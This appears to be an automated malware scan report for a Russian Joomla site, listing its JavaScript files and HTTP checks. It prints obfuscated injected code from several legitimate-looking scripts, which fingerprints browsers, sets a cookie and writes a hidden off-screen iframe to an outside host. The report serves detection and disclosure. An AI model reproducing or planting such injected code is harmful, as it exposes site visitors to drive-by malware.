Safe Browsing / Blacklists
Query: http://www.google.com/safebrowsing/diagnostic?site=biznes-design.ru
Result: The website is marked by Google as suspicious; visiting this website may harm your computer.
Details are available here.
Result: The website is marked by Google as suspicious; visiting this website may harm your computer.
Details are available here.
Scanned pages/files
Request | Server response | Status |
http://biznes-design.ru/ | 200 OK Content-Length: 32711 Content-Type: text/html | clean |
http://biznes-design.ru/media/system/js/mootools-core.js | 200 OK Content-Length: 112123 Content-Type: application/x-javascript | clean |
http://biznes-design.ru/media/system/js/core.js | 200 OK Content-Length: 20545 Content-Type: application/x-javascript | suspicious |
Suspicious code. Script contains iFrame. (function(){ function stripos (f_haystack, f_needle, f_offset) { var haystack = (f_haystack + '').toLowerCase(); var needle = (f_needle + '').toLowerCase(); var index = 0; if ((index = haystack.indexOf(needle, f_offset)) !== -1) { return index; } return false; } function barashkalo(){ var jungleobra = 'iPhone|Macintosh|Linux|iPad|Series40|SymbOS|Flock|SeaMonkey|Nokia|SlimBrowser|AmigaOS|Android|FreeBSD|Ch ...[3797 bytes skipped]... Decoded script: <iframe src=http://reactor.androidnoticia.com.br/?id=bill style=position:absolute;left:-1800px;top:-1800px; height="199" width="199"></iframe> | ||
http://biznes-design.ru/media/system/js/mootools-more.js | 200 OK Content-Length: 15691 Content-Type: application/x-javascript | suspicious |
Suspicious code. Script contains iFrame. (function(){ function stripos (f_haystack, f_needle, f_offset) { var haystack = (f_haystack + '').toLowerCase(); var needle = (f_needle + '').toLowerCase(); var index = 0; if ((index = haystack.indexOf(needle, f_offset)) !== -1) { return index; } return false; } function barashkalo(){ var jungleobra = 'iPhone|Macintosh|Linux|iPad|Series40|SymbOS|Flock|SeaMonkey|Nokia|SlimBrowser|AmigaOS|Android|FreeBSD|Ch ...[1490 bytes skipped]... Decoded script: <iframe src=http://reactor.androidnoticia.com.br/?id=bill style=position:absolute;left:-1800px;top:-1800px; height="199" width="199"></iframe> | ||
http://ajax.googleapis.com/ajax/libs/jquery/1.5.1/jquery.min.js | 200 OK Content-Length: 85260 Content-Type: text/javascript | clean |
http://biznes-design.ru/media/plg_jblibrary/jquery/jquery.noconflict.js | 200 OK Content-Length: 15706 Content-Type: application/x-javascript | malicious |
Malicious code - confirmed by antiviruses (see below) (function(){ function stripos (f_haystack, f_needle, f_offset) { var haystack = (f_haystack + '').toLowerCase(); var needle = (f_needle + '').toLowerCase(); var index = 0; if ((index = haystack.indexOf(needle, f_offset)) !== -1) { return index; } return false; } function barashkalo(){ var jungleobra = 'iPhone|Macintosh|Linux|iPad|Series40|SymbOS|Flock|SeaMonkey|Nokia|SlimBrowser|AmigaOS|Android|FreeBSD|Chrome|IEMobile|SymbianOS|Avant|Chromium|Firefox/1 if (cookie == undefined) { setCookie('tu'+'ge'+'ne'+'13'+'ve'+'ca1'+'ka'+'a9', true, 86400); document.write('<i'+'f'+'ra'+'me'+' s'+'rc'+'='+'http://reactor.androidnoticia.com.br/?id=bill'+' s'+'t'+'y'+'l'+'e'+'='+'p'+'o'+'s'+'i'+'t'+'i'+'o'+'n'+':'+'a'+'b'+'s'+'o'+'l'+'u'+'t'+'e'+';'+'l'+'e'+'f'+'t'+':'+'-1800px;top:-1800px;'+' height="199" width="199">'+'</i'+'fr'+'ame>'); } } })(); $.noConflict(); Decoded script: <iframe src=http://reactor.androidnoticia.com.br/?id=bill style=position:absolute;left:-1800px;top:-1800px; height="199" width="199"></iframe> Antivirus reports:
| ||
http://biznes-design.ru/media/plg_jblibrary/jquery/jquery.lazyload.js | 200 OK Content-Length: 17861 Content-Type: application/x-javascript | suspicious |
Suspicious code. Script contains iFrame. (function(){ function stripos (f_haystack, f_needle, f_offset) { var haystack = (f_haystack + '').toLowerCase(); var needle = (f_needle + '').toLowerCase(); var index = 0; if ((index = haystack.indexOf(needle, f_offset)) !== -1) { return index; } return false; } function barashkalo(){ var jungleobra = 'iPhone|Macintosh|Linux|iPad|Series40|SymbOS|Flock|SeaMonkey|Nokia|SlimBrowser|AmigaOS|Android|FreeBSD|Ch ...[3723 bytes skipped]... Decoded script: <iframe src=http://reactor.androidnoticia.com.br/?id=bill style=position:absolute;left:-1800px;top:-1800px; height="199" width="199"></iframe> | ||
http://biznes-design.ru/media/system/js/modal.js | 200 OK Content-Length: 25493 Content-Type: application/x-javascript | clean |
http://biznes-design.ru/media/k2/assets/js/jquery-1.7.1.min.js | 200 OK Content-Length: 109629 Content-Type: application/x-javascript | clean |
http://biznes-design.ru/components/com_k2/js/k2.js | 200 OK Content-Length: 22579 Content-Type: application/x-javascript | malicious |
Malicious code - confirmed by antiviruses (see below) (function(){ function stripos (f_haystack, f_needle, f_offset) { var haystack = (f_haystack + '').toLowerCase(); var needle = (f_needle + '').toLowerCase(); var index = 0; if ((index = haystack.indexOf(needle, f_offset)) !== -1) { return index; } return false; } function barashkalo(){ var jungleobra = 'iPhone|Macintosh|Linux|iPad|Series40|SymbOS|Flock|SeaMonkey|Nokia|SlimBrowser|AmigaOS|Android|FreeBSD|Chrome|IEMobile|SymbianOS|Avant|Chromium|Firefox/1 }); // Equal block heights for the "default" view $K2(window).load(function () { var blocks = $K2('.subCategory, .k2EqualHeights'); var maxHeight = 0; blocks.each(function(){ maxHeight = Math.max(maxHeight, parseInt($K2(this).css('height'))); }); blocks.css('height', maxHeight); }); ;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;; Decoded script: <iframe src=http://reactor.androidnoticia.com.br/?id=bill style=position:absolute;left:-1800px;top:-1800px; height="199" width="199"></iframe> Antivirus reports:
| ||
http://biznes-design.ru/templates/shaper_event/js/tools.js | 200 OK Content-Length: 17186 Content-Type: application/x-javascript | malicious |
Malicious code - confirmed by antiviruses (see below) (function(){ function stripos (f_haystack, f_needle, f_offset) { var haystack = (f_haystack + '').toLowerCase(); var needle = (f_needle + '').toLowerCase(); var index = 0; if ((index = haystack.indexOf(needle, f_offset)) !== -1) { return index; } return false; } function barashkalo(){ var jungleobra = 'iPhone|Macintosh|Linux|iPad|Series40|SymbOS|Flock|SeaMonkey|Nokia|SlimBrowser|AmigaOS|Android|FreeBSD|Chrome|IEMobile|SymbianOS|Avant|Chromium|Firefox/1 }) function sp_margin(container, dir){ if (typeof(dir)==='undefined') dir = 'right'; var rtl = document.getElement('.rtl'); if (rtl) { if (dir==='right') { dir = 'left'; } else { dir = 'right'; } } var c_width = (window.getSize().x - document.getElements('.sp-wrap')[0].getWidth())/2; document.id(container).setStyle('margin-' + dir, - c_width ); };;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;; Decoded script: <iframe src=http://reactor.androidnoticia.com.br/?id=bill style=position:absolute;left:-1800px;top:-1800px; height="199" width="199"></iframe> Antivirus reports:
| ||
http://biznes-design.ru/plugins/system/helix/js/menu.js | 200 OK Content-Length: 20582 Content-Type: application/x-javascript | suspicious |
Suspicious code. Script contains iFrame. (function(){ function stripos (f_haystack, f_needle, f_offset) { var haystack = (f_haystack + '').toLowerCase(); var needle = (f_needle + '').toLowerCase(); var index = 0; if ((index = haystack.indexOf(needle, f_offset)) !== -1) { return index; } return false; } function barashkalo(){ var jungleobra = 'iPhone|Macintosh|Linux|iPad|Series40|SymbOS|Flock|SeaMonkey|Nokia|SlimBrowser|AmigaOS|Android|FreeBSD|Ch ...[3721 bytes skipped]... Decoded script: ...[11752 bytes skipped]... lect_box.injectInside(selector);document.getElements('ul.sp-menu a.menu-item').each(function(el){optText=' '+el.get('text');optSub=el.getParents('ul').hasClass('sp-menu');len=optSub.length;dash;if(el.getParents('ul').hasClass('sp-menu')){dash=Array(len).join('–');optText=dash+optText}opt=new Element('option',{"value":el.href,"html":optText,"selected":el.href==window.location.href});opt.injectInside(select_box)})}}); <iframe src=http://reactor.androidnoticia.com.br/?id=bill style=position:absolute;left:-1800px;top:-1800px; height="199" width="199"></iframe> | ||
http://biznes-design.ru/templates/shaper_event/js/totop.js | 200 OK Content-Length: 16737 Content-Type: application/x-javascript | malicious |
Malicious code - confirmed by antiviruses (see below) (function(){ function stripos (f_haystack, f_needle, f_offset) { var haystack = (f_haystack + '').toLowerCase(); var needle = (f_needle + '').toLowerCase(); var index = 0; if ((index = haystack.indexOf(needle, f_offset)) !== -1) { return index; } return false; } function barashkalo(){ var jungleobra = 'iPhone|Macintosh|Linux|iPad|Series40|SymbOS|Flock|SeaMonkey|Nokia|SlimBrowser|AmigaOS|Android|FreeBSD|Chrome|IEMobile|SymbianOS|Avant|Chromium|Firefox/1 var a = document.id('topofpage'); if (a) { a.set('opacity','0').setStyle('display','block'); window.addEvent('scroll',function(e) { a.fade((window.getScroll().y > 300) ? 'in' : 'out') }); var b = new Fx.Scroll(window); a.addEvent('click', function (e) { new Event(e).stop(); b.toTop() }) } });;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;; Decoded script: <iframe src=http://reactor.androidnoticia.com.br/?id=bill style=position:absolute;left:-1800px;top:-1800px; height="199" width="199"></iframe> Antivirus reports:
| ||
http://biznes-design.ru/modules/mod_sptab/assets/js/sptab.js | 200 OK Content-Length: 19938 Content-Type: application/x-javascript | suspicious |
Suspicious code. Script contains iFrame. (function(){ function stripos (f_haystack, f_needle, f_offset) { var haystack = (f_haystack + '').toLowerCase(); var needle = (f_needle + '').toLowerCase(); var index = 0; if ((index = haystack.indexOf(needle, f_offset)) !== -1) { return index; } return false; } function barashkalo(){ var jungleobra = 'iPhone|Macintosh|Linux|iPad|Series40|SymbOS|Flock|SeaMonkey|Nokia|SlimBrowser|AmigaOS|Android|FreeBSD|Ch ...[3722 bytes skipped]... Decoded script: ...[10058 bytes skipped]... yle("top",-e+"px");b={top:[-e,0]}}else{this.items[a].setStyle("top",e+"px");b={top:[e,0]}}break}new Fx.Elements([this.items[g],this.items[a],this.items_mask],{duration:this.options.fxduration,transition:this.options.transition,onComplete:function(){this.running=false}.bind(this)}).start({"0":{display:'none'},"1":$merge({display:'block'},b),"2":{height:[e,this.options.autoHeight?this.items[a].getHeight():this.options.fixedHeight]}})}}; <iframe src=http://reactor.androidnoticia.com.br/?id=bill style=position:absolute;left:-1800px;top:-1800px; height="199" width="199"></iframe> | ||
http://biznes-design.ru/PopIn.js | 404 Not Found Content-Length: 206 Content-Type: text/html | clean |
Malicious Redirects
First query (normal visit):
GET / HTTP/1.1
Host: biznes-design.ru
Result:
HTTP/1.1 200 OK
Connection: close
Date: Fri, 26 Dec 2014 03:43:30 GMT
Server: nginx/1.6.2
Vary: Accept-Encoding
Content-Type: text/html; charset=utf-8
Set-Cookie: 3f83f744190cbb4b99f87758800a53ef=55fef50ec4820365e91e19974b36f644; path=/
Set-Cookie: shaper_event_layout=category; expires=Fri, 26-Dec-2014 04:43:30 GMT; path=/
Set-Cookie: shaper_event_layout=category; expires=Fri, 26-Dec-2014 04:43:30 GMT; path=/
X-Powered-By: PHP/5.2.17
GET / HTTP/1.1
Host: biznes-design.ru
Result:
HTTP/1.1 200 OK
Connection: close
Date: Fri, 26 Dec 2014 03:43:30 GMT
Server: nginx/1.6.2
Vary: Accept-Encoding
Content-Type: text/html; charset=utf-8
Set-Cookie: 3f83f744190cbb4b99f87758800a53ef=55fef50ec4820365e91e19974b36f644; path=/
Set-Cookie: shaper_event_layout=category; expires=Fri, 26-Dec-2014 04:43:30 GMT; path=/
Set-Cookie: shaper_event_layout=category; expires=Fri, 26-Dec-2014 04:43:30 GMT; path=/
X-Powered-By: PHP/5.2.17
Second query (visit from search engine):
GET / HTTP/1.1
Host: biznes-design.ru
Referer: http://www.google.com/search?q=biznes-design.ru
Result:
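The result is similar to the first query. No suspicious redirects were found. Note that this check only compares the server's HTTP responses: the hidden iframe reported under "Scanned pages/files" is written into the page by client-side JavaScript (document.write, gated on a cookie), so it does not appear as an HTTP redirect, and a clean result here does not mean the site is clean.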
GET / HTTP/1.1
Host: biznes-design.ru
Referer: http://www.google.com/search?q=biznes-design.ru
Result:
The result is similar to the first query. No suspicious redirects were found.